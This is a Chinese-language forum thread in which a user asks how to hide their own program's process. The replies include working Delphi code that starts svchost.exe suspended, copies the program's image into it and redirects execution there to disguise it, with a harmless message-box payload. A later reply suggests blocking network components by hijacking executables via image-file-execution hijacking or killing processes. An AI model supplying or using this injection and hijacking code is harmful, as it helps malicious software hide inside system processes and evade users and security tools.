进程隐藏问题!!

自己的程序进程隐藏怎么实现
现在做了一个,只是某些操作系统好用,有些操作系统不好用,有没有通用的程序。

解决方案 »

  1.   

    利用rootkit可以办到
    只不过太难了
      

  2.   

    防杀的倒有,只不过是C++的源码,我估计也没那个把C++转成delphi的功力
    至于注入
    uses
      Windows;Procedure WinMain(); stdcall;
    begin
    LoadLibrary('user32.dll');
    MessageBox(0, 'Hello world!Coder','By Anskya&', 0);
    ExitProcess(0); 
    end;var 
    St: TStartupInfo; 
    Pr: TProcessInformation; 
    InjectSize: dword; 
    Code: pointer; 
    Injected: pointer; 
    BytesWritten: dword; 
    Context: _CONTEXT;
    const
    injectprocess='svchost.exe';
    begin
    ZeroMemory(@St, SizeOf(TStartupInfo)); 
    St.cb := SizeOf(TStartupInfo);
    St.wShowWindow := SW_SHOW;
    if CreateProcess(nil, injectprocess, nil, nil, false, Create_SUSPENDED, nil, nil, St, Pr) then
    begin 
    Code := pointer(GetModuleHandle(nil));
    InjectSize := PImageOptionalHeader(pointer(integer(Code) + PImageDosHeader(Code)._lfanew +
                SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
    Injected := VirtualAllocEx(Pr.hProcess, Code, InjectSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
    WriteProcessMemory(Pr.hProcess, Injected, Code, InjectSize, BytesWritten); 
    Context.ContextFlags := CONTEXT_FULL; 
    GetThreadContext(Pr.hThread, Context);
    Context.Eip := dword(@WinMain); 
    SetThreadContext(Pr.hThread, Context); 
    ResumeThread(Pr.hThread); 
    end; end.差不多就这个了
      

  3.   

    看来通用的确实没有   根据操作系统的不同而不同 
    我还想问个别的问题,就是怎么能把windows组件屏蔽了    使计算机不能上网(这个包含,ad拨号,无线网络,红外,蓝牙等)
      

  4.   

    屏蔽组件?
    找到对应的EXE文件,把它映象劫持掉
    或者写个程序枚举进程,找到就KILL掉